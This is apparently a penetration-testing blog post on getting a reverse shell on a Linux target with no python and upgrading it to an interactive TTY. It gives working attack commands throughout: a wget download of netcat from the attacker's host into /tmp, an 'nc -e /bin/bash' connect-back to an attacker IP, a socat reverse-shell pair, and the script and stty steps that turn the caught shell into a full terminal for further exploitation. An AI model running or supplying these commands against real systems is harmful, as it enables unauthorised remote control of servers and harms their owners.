Linux reverse shell without python.

During a recent application exploit that landed in a non-interactive shell, the usual path was sought: spawn a reverse shell and then upgrade it to a TTY.

It turned out that the go-to tools (python, php, socat, ruby) were all missing from the target, so the following steps were taken to spawn the reverse shell and upgrade it to a TTY (the exploit screenshot from the original post is not reproduced here):

If you just want the commands without the explanation, fire the following into the dumb shell you have caught (it is typed on the attacking machine but runs on the target):

/usr/bin/script -qc /bin/bash /dev/null
# then press CTRL + Z to background the shell, and at your local prompt run:
stty raw -echo; fg; reset

This breaks you out of the dumb shell and into a proper TTY; you can then su, use tab completion and run any other terminal-based command. If that does not work 100% and you want to see each hoop being jumped through, one of many ways to get there is below.

Copy over nc and spawn a shell

Using wget on the target and Python's SimpleHTTPServer on the attacking machine, nc was easily moved over (note the order: the HTTP server must be up before the wget, and the listener before the connect-back):

Attacking Machine: cp /usr/bin/nc .; python -m SimpleHTTPServer 9998
Server: cd /tmp; wget http://10.x.x.x:9998/nc; chmod +x nc
Attacking Machine: nc -nlvp 9998   (stop the HTTP server first, it is still holding port 9998)
Server: ./nc 10.x.x.x 9998 -e /bin/bash

Two things to check before bothering with the transfer: the module name is case-sensitive (SimpleHTTPServer; on Python 3 it is http.server), and the nc you copy must be a build that actually supports -e (traditional netcat or ncat, not the OpenBSD nc that many distros install as nc) and must be built for the target's architecture.

Break out of pseudo shell and upgrade to a tty shell

To upgrade our shell we first need to break out of the dumb shell we are in by spawning a pty. Generally I would default to trusty python for this:

python -c 'import pty; pty.spawn("/bin/bash")'
# OR using socat (needs socat on both ends)
Attacking Server: socat file:`tty`,raw,echo=0 tcp-listen:9998
Victim Machine: socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.x.x.x:9998 

As neither of our preferred tools was available on the target, we can fall back on a simpler and seemingly long-forgotten way of upgrading: script, which is part of util-linux and so is present on almost every Linux box.

In the reverse nc shell caught on our attacking machine (the command is typed there but executes on the target) we can simply break out of the dumb shell with:

Server (typed into the caught nc shell): /usr/bin/script -qc /bin/bash /dev/null

All that is left is to do the following:
A: CTRL + Z to background the shell
B: paste or type the following at your local prompt on the attacking machine.

stty raw -echo; fg; reset

Now you have a fully interactive shell with tab completion, job control and a working CTRL + C, and can continue to exploit the server, including running su or local ssh commands on it. Two caveats worth knowing: the reset at the end of that chain runs on the attacking machine only once the foreground job returns, so if the remote side still behaves oddly run reset (or export TERM=xterm) inside the upgraded shell; and after raw mode the remote terminal does not know your window size, so set it there with stty rows and columns matching the output of stty size on your own terminal.

Granted, there are many more ways to achieve the same shell, but using script seems to be overlooked quite often, hence the post.
